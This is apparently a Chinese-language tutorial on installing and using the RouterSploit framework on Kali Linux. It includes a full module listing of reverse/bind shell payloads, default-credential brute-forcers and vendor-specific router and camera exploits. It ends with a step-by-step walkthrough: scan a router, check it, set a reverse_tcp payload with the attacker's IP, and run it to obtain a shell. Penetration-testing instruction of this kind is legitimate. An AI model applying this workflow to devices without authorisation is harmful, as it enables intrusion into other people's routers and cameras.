routerSploit是一款專門針對路由器和嵌入式設(shè)備的漏洞測試工具，它提供了一套用于掃描、發(fā)現(xiàn)和利用路由器和嵌入式設(shè)備漏洞的功能。該工具使用Python編寫，并集成了大量針對路由器和相關(guān)設(shè)備的漏洞利用模塊，用戶可以利用這些模塊來進(jìn)行滲透測試和安全評估。RouterSploit支持通過簡單的命令行界面進(jìn)行操作，并提供了豐富的功能，包括掃描、漏洞利用、暴力破解等，使用戶能夠快速、有效地評估目標(biāo)設(shè)備的安全性。

RouterSploit的主要功能包括：

• 掃描功能：能夠?qū)δ繕?biāo)路由器或嵌入式設(shè)備進(jìn)行端口掃描、服務(wù)識別和漏洞掃描，幫助用戶快速了解設(shè)備的安全狀況。
• 漏洞利用：集成了大量針對路由器和嵌入式設(shè)備的漏洞利用模塊，用戶可以利用這些模塊對已知的漏洞進(jìn)行利用，以驗證設(shè)備的安全性或進(jìn)行滲透測試。
• 暴力破解功能：支持對路由器和相關(guān)設(shè)備的認(rèn)證憑據(jù)進(jìn)行暴力破解，幫助評估設(shè)備的認(rèn)證機(jī)制是否安全。
• 模塊化框架：具有模塊化的設(shè)計結(jié)構(gòu)，用戶可以輕松添加新的漏洞利用模塊或擴(kuò)展現(xiàn)有功能，以適應(yīng)不斷變化的安全需求。

一.kali安裝

1.1安裝RouterSploit

默認(rèn)情況下RouterSploit沒有安裝，在終端中輸入routersploit命令后，系統(tǒng)自動提示安裝，輸入"Y"然后輸入kali賬號的密碼即可自動進(jìn)行安裝。

也可以克隆安裝：

git clone https://github.com/reverse-shell/routersploit

圖片

后面執(zhí)行顯示出錯還需要安裝一些需要的依賴包

pip install pycryptodome

1.2啟動RouterSploit

在終端中輸入routersploit即可開啟RouterSploit框架。

圖片

二.RouterSploit主要命令

2.1基本命令

1.help命令

顯示幫助信息

圖片

set：設(shè)置模塊的參數(shù)，例如set RHOST 192.168.1.1設(shè)置目標(biāo)主機(jī)。

2.show命令

info：顯示模塊的基本信息和描述。

options：顯示模塊的可配置選項和參數(shù)。

advanced：顯示模塊的高級選項和參數(shù)。

devices：顯示已知設(shè)備的信息。

all：顯示所有可用的模塊。

encoders：顯示可用的編碼器。

creds：顯示已經(jīng)捕獲的憑證。

exploits：顯示可用的漏洞利用模塊。

scanners：顯示可用的掃描模塊。

wordlists：顯示可用的字典文件。

圖片

show all顯示所有的

generic/upnp/ssdp_msearch

generic/bluetooth/btle_write

generic/bluetooth/btle_scan

generic/bluetooth/btle_enumerate

payloads/x86/reverse_tcp

payloads/x86/bind_tcp

payloads/perl/reverse_tcp

payloads/perl/bind_tcp

payloads/armle/reverse_tcp

payloads/armle/bind_tcp

payloads/php/reverse_tcp

payloads/php/bind_tcp

payloads/mipsle/reverse_tcp

payloads/mipsle/bind_tcp

payloads/mipsbe/reverse_tcp

payloads/mipsbe/bind_tcp

payloads/x64/reverse_tcp

payloads/x64/bind_tcp

payloads/cmd/netcat_reverse_tcp

payloads/cmd/perl_reverse_tcp

payloads/cmd/perl_bind_tcp

payloads/cmd/awk_bind_udp

payloads/cmd/awk_bind_tcp

payloads/cmd/python_reverse_udp

payloads/cmd/netcat_bind_tcp

payloads/cmd/php_bind_tcp

payloads/cmd/python_bind_udp

payloads/cmd/python_bind_tcp

payloads/cmd/python_reverse_tcp

payloads/cmd/awk_reverse_tcp

payloads/cmd/php_reverse_tcp

payloads/cmd/bash_reverse_tcp

payloads/python/reverse_udp

payloads/python/bind_udp

payloads/python/reverse_tcp

payloads/python/bind_tcp

scanners/autopwn

scanners/routers/router_scan

scanners/misc/misc_scan

scanners/cameras/camera_scan

encoders/php/hex

encoders/php/base64

encoders/python/hex

encoders/python/base64

creds/routers/netsys/telnet_default_creds

creds/routers/netsys/ftp_default_creds

creds/routers/netsys/ssh_default_creds

creds/routers/netcore/telnet_default_creds

creds/routers/netcore/ftp_default_creds

creds/routers/netcore/ssh_default_creds

creds/routers/ipfire/telnet_default_creds

creds/routers/ipfire/ftp_default_creds

creds/routers/ipfire/ssh_default_creds

creds/routers/technicolor/telnet_default_creds

creds/routers/technicolor/ftp_default_creds

creds/routers/technicolor/ssh_default_creds

creds/routers/3com/telnet_default_creds

creds/routers/3com/ftp_default_creds

creds/routers/3com/ssh_default_creds

creds/routers/2wire/telnet_default_creds

creds/routers/2wire/ftp_default_creds

creds/routers/2wire/ssh_default_creds

creds/routers/thomson/telnet_default_creds

creds/routers/thomson/ftp_default_creds

creds/routers/thomson/ssh_default_creds

creds/routers/huawei/telnet_default_creds

creds/routers/huawei/ftp_default_creds

creds/routers/huawei/ssh_default_creds

creds/routers/zte/telnet_default_creds

creds/routers/zte/ftp_default_creds

creds/routers/zte/ssh_default_creds

creds/routers/fortinet/telnet_default_creds

creds/routers/fortinet/ftp_default_creds

creds/routers/fortinet/ssh_default_creds

creds/routers/juniper/telnet_default_creds

creds/routers/juniper/ftp_default_creds

creds/routers/juniper/ssh_default_creds

creds/routers/pfsense/webinterface_http_form_default_creds

creds/routers/pfsense/ssh_default_creds

creds/routers/zyxel/telnet_default_creds

creds/routers/zyxel/ftp_default_creds

creds/routers/zyxel/ssh_default_creds

creds/routers/cisco/telnet_default_creds

creds/routers/cisco/ftp_default_creds

creds/routers/cisco/ssh_default_creds

creds/routers/ubiquiti/telnet_default_creds

creds/routers/ubiquiti/ftp_default_creds

creds/routers/ubiquiti/ssh_default_creds

creds/routers/asus/telnet_default_creds

creds/routers/asus/ftp_default_creds

creds/routers/asus/ssh_default_creds

creds/routers/movistar/telnet_default_creds

creds/routers/movistar/ftp_default_creds

creds/routers/movistar/ssh_default_creds

creds/routers/asmax/telnet_default_creds

creds/routers/asmax/ftp_default_creds

creds/routers/asmax/webinterface_http_auth_default_creds

creds/routers/asmax/ssh_default_creds

creds/routers/bhu/telnet_default_creds

creds/routers/bhu/ftp_default_creds

creds/routers/bhu/ssh_default_creds

creds/routers/belkin/telnet_default_creds

creds/routers/belkin/ftp_default_creds

creds/routers/belkin/ssh_default_creds

creds/routers/dlink/telnet_default_creds

creds/routers/dlink/ftp_default_creds

creds/routers/dlink/ssh_default_creds

creds/routers/comtrend/telnet_default_creds

creds/routers/comtrend/ftp_default_creds

creds/routers/comtrend/ssh_default_creds

creds/routers/tplink/telnet_default_creds

creds/routers/tplink/ftp_default_creds

creds/routers/tplink/ssh_default_creds

creds/routers/billion/telnet_default_creds

creds/routers/billion/ftp_default_creds

creds/routers/billion/ssh_default_creds

creds/routers/netgear/telnet_default_creds

creds/routers/netgear/ftp_default_creds

creds/routers/netgear/ssh_default_creds

creds/routers/mikrotik/telnet_default_creds

creds/routers/mikrotik/api_ros_default_creds

creds/routers/mikrotik/ftp_default_creds

creds/routers/mikrotik/ssh_default_creds

creds/routers/linksys/telnet_default_creds

creds/routers/linksys/ftp_default_creds

creds/routers/linksys/ssh_default_creds

creds/generic/snmp_bruteforce

creds/generic/ftp_default

creds/generic/telnet_default

creds/generic/http_basic_digest_default

creds/generic/ssh_bruteforce

creds/generic/ssh_default

creds/generic/http_basic_digest_bruteforce

creds/generic/telnet_bruteforce

creds/generic/ftp_bruteforce

creds/cameras/iqinvision/telnet_default_creds

creds/cameras/iqinvision/ftp_default_creds

creds/cameras/iqinvision/ssh_default_creds

creds/cameras/axis/telnet_default_creds

creds/cameras/axis/ftp_default_creds

creds/cameras/axis/webinterface_http_auth_default_creds

creds/cameras/axis/ssh_default_creds

creds/cameras/samsung/telnet_default_creds

creds/cameras/samsung/ftp_default_creds

creds/cameras/samsung/ssh_default_creds

creds/cameras/vacron/telnet_default_creds

creds/cameras/vacron/ftp_default_creds

creds/cameras/vacron/ssh_default_creds

creds/cameras/basler/telnet_default_creds

creds/cameras/basler/webinterface_http_form_default_creds

creds/cameras/basler/ftp_default_creds

creds/cameras/basler/ssh_default_creds

creds/cameras/siemens/telnet_default_creds

creds/cameras/siemens/ftp_default_creds

creds/cameras/siemens/ssh_default_creds

creds/cameras/arecont/telnet_default_creds

creds/cameras/arecont/ftp_default_creds

creds/cameras/arecont/ssh_default_creds

creds/cameras/avtech/telnet_default_creds

creds/cameras/avtech/ftp_default_creds

creds/cameras/avtech/ssh_default_creds

creds/cameras/hikvision/telnet_default_creds

creds/cameras/hikvision/ftp_default_creds

creds/cameras/hikvision/ssh_default_creds

creds/cameras/geovision/telnet_default_creds

creds/cameras/geovision/ftp_default_creds

creds/cameras/geovision/ssh_default_creds

creds/cameras/cisco/telnet_default_creds

creds/cameras/cisco/ftp_default_creds

creds/cameras/cisco/ssh_default_creds

creds/cameras/stardot/telnet_default_creds

creds/cameras/stardot/ftp_default_creds

creds/cameras/stardot/ssh_default_creds

creds/cameras/speco/telnet_default_creds

creds/cameras/speco/ftp_default_creds

creds/cameras/speco/ssh_default_creds

creds/cameras/brickcom/telnet_default_creds

creds/cameras/brickcom/ftp_default_creds

creds/cameras/brickcom/webinterface_http_auth_default_creds

creds/cameras/brickcom/ssh_default_creds

creds/cameras/mobotix/telnet_default_creds

creds/cameras/mobotix/ftp_default_creds

creds/cameras/mobotix/ssh_default_creds

creds/cameras/acti/telnet_default_creds

creds/cameras/acti/webinterface_http_form_default_creds

creds/cameras/acti/ftp_default_creds

creds/cameras/acti/ssh_default_creds

creds/cameras/videoiq/telnet_default_creds

creds/cameras/videoiq/ftp_default_creds

creds/cameras/videoiq/ssh_default_creds

creds/cameras/dlink/telnet_default_creds

creds/cameras/dlink/ftp_default_creds

creds/cameras/dlink/ssh_default_creds

creds/cameras/jvc/telnet_default_creds

creds/cameras/jvc/ftp_default_creds

creds/cameras/jvc/ssh_default_creds

creds/cameras/avigilon/telnet_default_creds

creds/cameras/avigilon/ftp_default_creds

creds/cameras/avigilon/ssh_default_creds

creds/cameras/canon/telnet_default_creds

creds/cameras/canon/ftp_default_creds

creds/cameras/canon/webinterface_http_auth_default_creds

creds/cameras/canon/ssh_default_creds

creds/cameras/grandstream/telnet_default_creds

creds/cameras/grandstream/ftp_default_creds

creds/cameras/grandstream/ssh_default_creds

creds/cameras/sentry360/telnet_default_creds

creds/cameras/sentry360/ftp_default_creds

creds/cameras/sentry360/ssh_default_creds

creds/cameras/american_dynamics/telnet_default_creds

creds/cameras/american_dynamics/ftp_default_creds

creds/cameras/american_dynamics/ssh_default_creds

creds/cameras/honeywell/telnet_default_creds

creds/cameras/honeywell/ftp_default_creds

creds/cameras/honeywell/ssh_default_creds

exploits/routers/netsys/multi_rce

exploits/routers/netcore/udp_53413_rce

exploits/routers/ipfire/ipfire_proxy_rce

exploits/routers/ipfire/ipfire_oinkcode_rce

exploits/routers/ipfire/ipfire_shellshock

exploits/routers/technicolor/tc7200_password_disclosure_v2

exploits/routers/technicolor/tc7200_password_disclosure

exploits/routers/technicolor/tg784_authbypass

exploits/routers/technicolor/dwg855_authbypass

exploits/routers/multi/misfortune_cookie

exploits/routers/multi/rom0

exploits/routers/multi/tcp_32764_rce

exploits/routers/multi/tcp_32764_info_disclosure

exploits/routers/multi/gpon_home_gateway_rce

exploits/routers/3com/officeconnect_rce

exploits/routers/3com/ap8760_password_disclosure

exploits/routers/3com/imc_path_traversal

exploits/routers/3com/officeconnect_info_disclosure

exploits/routers/3com/imc_info_disclosure

exploits/routers/2wire/gateway_auth_bypass

exploits/routers/2wire/4011g_5012nv_path_traversal

exploits/routers/thomson/twg849_info_disclosure

exploits/routers/thomson/twg850_password_disclosure

exploits/routers/huawei/e5331_mifi_info_disclosure

exploits/routers/huawei/hg530_hg520b_password_disclosure

exploits/routers/huawei/hg866_password_change

exploits/routers/huawei/hg520_info_disclosure

exploits/routers/zte/f460_f660_backdoor

exploits/routers/zte/zxv10_rce

exploits/routers/zte/zxhn_h108n_wifi_password_disclosure

exploits/routers/fortinet/fortigate_os_backdoor

exploits/routers/zyxel/zywall_usg_extract_hashes

exploits/routers/zyxel/p660hn_t_v2_rce

exploits/routers/zyxel/d1000_rce

exploits/routers/zyxel/p660hn_t_v1_rce

exploits/routers/zyxel/d1000_wifi_password_disclosure

exploits/routers/cisco/ucm_info_disclosure

exploits/routers/cisco/firepower_management60_path_traversal

exploits/routers/cisco/ucs_manager_rce

exploits/routers/cisco/secure_acs_bypass

exploits/routers/cisco/dpc2420_info_disclosure

exploits/routers/cisco/unified_multi_path_traversal

exploits/routers/cisco/ios_http_authorization_bypass

exploits/routers/cisco/firepower_management60_rce

exploits/routers/cisco/catalyst_2960_rocem

exploits/routers/ubiquiti/airos_6_x

exploits/routers/asus/asuswrt_lan_rce

exploits/routers/asus/rt_n16_password_disclosure

exploits/routers/asus/infosvr_backdoor_rce

exploits/routers/movistar/adsl_router_bhs_rta_path_traversal

exploits/routers/asmax/ar_804_gu_rce

exploits/routers/asmax/ar_1004g_password_disclosure

exploits/routers/bhu/bhu_urouter_rce

exploits/routers/belkin/n150_path_traversal

exploits/routers/belkin/g_plus_info_disclosure

exploits/routers/belkin/g_n150_password_disclosure

exploits/routers/belkin/play_max_prce

exploits/routers/belkin/auth_bypass

exploits/routers/belkin/n750_rce

exploits/routers/dlink/multi_hedwig_cgi_exec

exploits/routers/dlink/dir_645_password_disclosure

exploits/routers/dlink/dwl_3200ap_password_disclosure

exploits/routers/dlink/dsl_2740r_dns_change

exploits/routers/dlink/dir_300_645_815_upnp_rce

exploits/routers/dlink/dcs_930l_auth_rce

exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change

exploits/routers/dlink/dsl_2750b_rce

exploits/routers/dlink/multi_hnap_rce

exploits/routers/dlink/dwr_932_info_disclosure

exploits/routers/dlink/dvg_n5402sp_path_traversal

exploits/routers/dlink/dir_8xx_password_disclosure

exploits/routers/dlink/dwr_932b_backdoor

exploits/routers/dlink/dir_645_815_rce

exploits/routers/dlink/dsl_2640b_dns_change

exploits/routers/dlink/dsp_w110_rce

exploits/routers/dlink/dir_815_850l_rce

exploits/routers/dlink/dir_300_600_rce

exploits/routers/dlink/dir_300_320_600_615_info_disclosure

exploits/routers/dlink/dgs_1510_add_user

exploits/routers/dlink/dsl_2750b_info_disclosure

exploits/routers/dlink/dir_850l_creds_disclosure

exploits/routers/dlink/dir_825_path_traversal

exploits/routers/dlink/dir_300_320_615_auth_bypass

exploits/routers/dlink/dns_320l_327l_rce

exploits/routers/dlink/dsl_2730_2750_path_traversal

exploits/routers/comtrend/ct_5361t_password_disclosure

exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure

exploits/routers/tplink/wdr740nd_wdr740n_path_traversal

exploits/routers/tplink/wdr740nd_wdr740n_backdoor

exploits/routers/tplink/archer_c2_c20i_rce

exploits/routers/billion/billion_7700nr4_password_disclosure

exploits/routers/billion/billion_5200w_rce

exploits/routers/shuttle/915wm_dns_change

exploits/routers/netgear/jnr1010_path_traversal

exploits/routers/netgear/dgn2200_ping_cgi_rce

exploits/routers/netgear/multi_rce

exploits/routers/netgear/prosafe_rce

exploits/routers/netgear/dgn2200_dnslookup_cgi_rce

exploits/routers/netgear/r7000_r6400_rce

exploits/routers/netgear/multi_password_disclosure-2017-5521

exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal

exploits/routers/netgear/n300_auth_bypass

exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure

exploits/routers/mikrotik/routeros_jailbreak

exploits/routers/linksys/wrt100_110_rce

exploits/routers/linksys/smartwifi_password_disclosure

exploits/routers/linksys/eseries_themoon_rce

exploits/routers/linksys/1500_2500_rce

exploits/routers/linksys/wap54gv3_rce

exploits/generic/ssh_auth_keys

exploits/generic/heartbleed

exploits/generic/shellshock

exploits/misc/asus/b1m_projector_rce

exploits/misc/wepresent/wipg1000_rce

exploits/misc/miele/pg8528_path_traversal

exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal

exploits/cameras/multi/netwave_ip_camera_information_disclosure

exploits/cameras/multi/dvr_creds_disclosure

exploits/cameras/multi/P2P_wificam_credential_disclosure

exploits/cameras/multi/P2P_wificam_rce

exploits/cameras/siemens/cvms2025_credentials_disclosure

exploits/cameras/cisco/video_surv_path_traversal

exploits/cameras/jovision/jovision_credentials_disclosure

exploits/cameras/brickcom/users_cgi_creds_disclosure

exploits/cameras/brickcom/corp_network_cameras_conf_disclosure

exploits/cameras/mvpower/dvr_jaws_rce

exploits/cameras/dlink/dcs_930l_932l_auth_bypass

exploits/cameras/avigilon/videoiq_camera_path_traversal

exploits/cameras/xiongmai/uc_httpd_path_traversal

exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli

exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor

exploits/cameras/honeywell/hicc_1100pt_password_disclosure

3.run

執(zhí)行當(dāng)前模塊來利用目標(biāo)設(shè)備。

4.use命令

use ：選擇要使用的模塊，例如漏洞利用模塊、掃描模塊等。例如use scanners/autopwn

5.執(zhí)行指定的命令

exec ：在shell中執(zhí)行指定的命令，可以用于執(zhí)行系統(tǒng)命令等。

在RouterSploit中，exec命令可以用于執(zhí)行特定的系統(tǒng)命令。您可以使用exec命令來執(zhí)行各種操作系統(tǒng)命令和工具，包括但不限于以下內(nèi)容：

（1）執(zhí)行系統(tǒng)命令

exec run ifconfig

這個例子會在目標(biāo)設(shè)備上執(zhí)行ifconfig命令，顯示網(wǎng)絡(luò)接口的配置信息。

（2）執(zhí)行其他工具：

exec run nmap -sP 192.168.0.1/24

這個例子會在目標(biāo)設(shè)備上執(zhí)行nmap掃描命令，對指定網(wǎng)段進(jìn)行主機(jī)存活性檢測。

（3）執(zhí)行自定義腳本

exec run /path/to/custom_script.sh arg1 arg2

這個例子會在目標(biāo)設(shè)備上執(zhí)行自定義的Shell腳本，并傳入?yún)?shù)arg1和arg2。

6.search 搜索命令

search ：搜索符合特定關(guān)鍵詞的模塊。

7.退出和返回

exit：退出RouterSploit工具。

back：返回上一級菜單。

2.2掃描結(jié)果中符號

RouterSploit掃描過程及結(jié)果中會有三個符號[+]、[-]、[*]，特定的含義如下：

[+] 表示存在漏洞：掃描結(jié)果表明目標(biāo)系統(tǒng)存在一個或多個已知的安全漏洞。

[-] 表示漏洞不存在：掃描結(jié)果表明目標(biāo)系統(tǒng)未發(fā)現(xiàn)任何已知的安全漏洞。

[*] 表示無法確定：掃描結(jié)果表明無法確定目標(biāo)系統(tǒng)是否存在已知的安全漏洞，可能由于掃描條件不足或存在其他未知因素。

三.RouterSploit利用流程

3.1RouterSploit掃描路由器漏洞

1.確認(rèn)路由器地址

tracert www.sina.com.cn

第一個結(jié)果就是本地路由器地址。

3.2.掃描路由器

use scanners/autopwn

show options

set RHOST 192.168.1.1

run

3.3.對漏洞進(jìn)行檢查

use exploits/routers/3com/officeconnect_rce

set target 192.168.31.1

check

3.4.漏洞利用

1.配置playload

可以使用的playload列表（show all命令獲?。?，網(wǎng)上很多文章通過show playloads命令來獲取，kali環(huán)境執(zhí)行未發(fā)現(xiàn)，有可能是python版本有。

payloads/x86/reverse_tcp

payloads/x86/bind_tcp

payloads/perl/reverse_tcp

payloads/perl/bind_tcp

payloads/armle/reverse_tcp

payloads/armle/bind_tcp

payloads/php/reverse_tcp

payloads/php/bind_tcp

payloads/mipsle/reverse_tcp

payloads/mipsle/bind_tcp

payloads/mipsbe/reverse_tcp

payloads/mipsbe/bind_tcp

payloads/x64/reverse_tcp

payloads/x64/bind_tcp

payloads/cmd/netcat_reverse_tcp

payloads/cmd/perl_reverse_tcp

payloads/cmd/perl_bind_tcp

payloads/cmd/awk_bind_udp

payloads/cmd/awk_bind_tcp

payloads/cmd/python_reverse_udp

payloads/cmd/netcat_bind_tcp

payloads/cmd/php_bind_tcp

payloads/cmd/python_bind_udp

payloads/cmd/python_bind_tcp

payloads/cmd/python_reverse_tcp

payloads/cmd/awk_reverse_tcp

payloads/cmd/php_reverse_tcp

payloads/cmd/bash_reverse_tcp

payloads/python/reverse_udp

payloads/python/bind_udp

payloads/python/reverse_tcp

payloads/python/bind_tcp

（1）選擇對應(yīng)的payload

use payloads/x64/reverse_tcp

（2）查看配置

show options

（3）設(shè)置payload

set lhost [你的ip]

（4）再次查看配置

show options

（5）開始攻擊

run

如果存在可利用的漏洞則反彈shell